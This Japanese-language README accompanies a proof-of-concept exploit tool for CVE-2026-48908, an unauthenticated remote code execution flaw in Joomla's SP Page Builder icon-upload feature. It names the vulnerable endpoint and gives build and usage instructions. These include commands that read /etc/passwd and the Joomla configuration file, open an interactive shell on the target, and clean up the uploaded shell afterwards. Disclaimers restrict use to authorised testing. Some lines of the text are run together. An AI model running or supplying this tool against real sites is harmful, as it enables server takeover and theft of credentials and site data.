
CVE-2026-48908 - SP Page Builder Joomla 未認証RCE
CVE-2026-48908 の概念実証(PoC)エクスプロイトです。これは、Joomla の SP Page Builder コンポーネントにおける未認証のリモートコード実行(RCE)の脆弱性です。
CVE-2026-48908 は、SP Page Builder コンポーネントにおける ZIP ファイル展開処理の不備により、未認証の攻撃者が脆弱な Joomla インストール環境上で任意のコードを実行できるようにする重大なセキュリティ脆弱性です。
index.php?option=com_sppagebuilder&task=asset.uploadCustomIconこの脆弱性はアセットアップロード機能に存在し、アプリケーションがアイコンアセットを含む ZIP ファイルの検証と展開を適切に行いません。攻撃者は PHP ペイロードを含む悪意のある ZIP ファイルを細工し、Web からアクセス可能なディレクトリに展開させることで、リモートコード実行を可能にします。
golang.org/x/term - 安全なパスワード入力のためのターミナルユーティリティgit clone https://github.com/gagaltotal/CVE-2026-48908-SP-Page-Builder-Joomla
cd CVE-2026-48908-SP-Page-Builder-Joomla
go mod init CVE-2026-48908-SP-Page-Builder-Joomla
go mod download
or
go mod tidy
go build -o poc_tot poc_tot.go
コンパイル済みのバイナリはリリースセクションで入手できます。


./poc_tot -target http://target-site.com -cmd "whoami"
./poc_tot -target http://target-site.com -shell
./poc_tot -target http://target-site.com -check
./poc_tot -target http://target-site.com -cleanup
./poc_tot -target http://target-site.com -cmd "id" -token "your_joomla_token"
-target string
Target URL of vulnerable Joomla installation (required)
Example: http://target.com or https://target.com
-cmd string
System command to execute on target
Example: "cat /etc/passwd"
-shell
Launch interactive shell on target (requires successful exploitation)
-check
Check if target is vulnerable without attempting exploitation
-cleanup
Remove uploaded shell and artifacts from target
-token string
CSRF token for exploitation (optional, auto-detected if not provided)
このツールは複数のエクスプロイトベクトルをサポートしています:
./poc_tot -target http://vulnerable.local -check
./poc_tot -target http://vulnerable.local -cmd "ls -la /var/www/html"
./poc_tot -target http://vulnerable.local -cmd "cat configuration.php"
./poc_tot -target http://vulnerable.local -shell
# In shell:
> id
> whoami
> pwd
./poc_tot -target http://vulnerable.local -cleanup
SP Page Builder コンポーネントを導入した Joomla を運用している場合:
本ソフトウェアは、教育目的および許可を得たセキュリティテストのみを目的として提供されます。コンピュータシステムへの不正アクセスは違法です。作者は、本ツールの誤用または本ツールによって引き起こされた損害について責任を負いません。ユーザーは、任意のターゲットシステムで本ツールを使用する前に、適切な許可を得ていることを確認する責任があります。
本ツールを使用することにより、以下を了解したものとみなされます:
本ツールは、防衛的なセキュリティ研究および許可を得たペネトレーションテストのみを目的としています。コンピュータシステムへの不正アクセスは、Computer Fraud and Abuse Act(CFAA)および他の法域における類似の法律に違反します。セキュリティテストを実施する前に、必ず書面による適切な許可を取得してください。
index.php?option=com_installer&view=manageセキュリティ研究への貢献を歓迎します。以下の点にご協力ください:
GhostGTR666 (Gagaltotal666)
問題、質問、または貢献については:
本プロジェクトは、セキュリティ研究目的のために現状有姿(as-is)で提供されます。使用前に、セキュリティツールおよびペネトレーションテストに関する現地の法律を確認してください。
最終更新日: 2026-06-24
免責事項: 本ツールは許可を得たセキュリティテストのみを目的としています。コンピュータシステムへの不正アクセスは違法です。